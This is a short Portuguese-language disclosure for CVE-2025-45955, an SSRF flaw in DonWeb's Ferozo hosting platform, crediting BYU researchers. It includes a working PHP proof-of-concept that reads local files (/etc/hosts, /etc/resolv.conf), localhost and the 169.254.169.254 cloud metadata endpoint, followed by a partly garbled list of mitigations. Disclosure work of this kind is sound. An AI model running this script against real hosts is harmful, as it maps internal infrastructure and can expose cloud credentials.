
Exploit de prova de conceito para CVE-2025-45955 demonstrando Server-Side Request Forgery (SSRF) na plataforma de hospedagem DonWeb Ferozo, permitindo mapeamento de infraestrutura interna e enumeração de metadados da nuvem.
Um atacante pode explorar esta vulnerabilidade enviando e executando um arquivo PHP especialmente criado na plataforma de hospedagem Ferozo. Quando acessado, o arquivo inicia uma série de tentativas de SSRF visando serviços internos (como 127.0.0.1, 169.254.169.254, ou endpoints de malha de serviço), arquivos locais (ex.: file:///etc/passwd), e endpoints de metadados de nuvem conhecidos. O script coleta respostas ou mensagens de erro, permitindo que o atacante mapeie a infraestrutura interna, enumere serviços acessíveis e reúna informações sensíveis para exploração posterior.
O código a seguir demonstra a vulnerabilidade:
<?php
$targets = [
"file:///etc/hosts",
"file:///etc/resolv.conf",
"http://127.0.0.1/",
"http://169.254.169.254/latest/meta-data/"
];
foreach ($targets as $url) {
echo "[*] Trying: $url\n";
$res = @file_get_contents($url);
echo $res ? substr($res, 0, 500) : "Request failed or unreadable.\n";
}
?>
file_get_contents, fopen, etc.)127.0.0.0/8, 169.254.169.254, etc.) por meio de regras de firewall de saídaCVE-2025-45955
Reportado por [Facundo Fernandez, Jinook Kim, Surendra Puppala / Pesquisadores de Segurança | @BYU]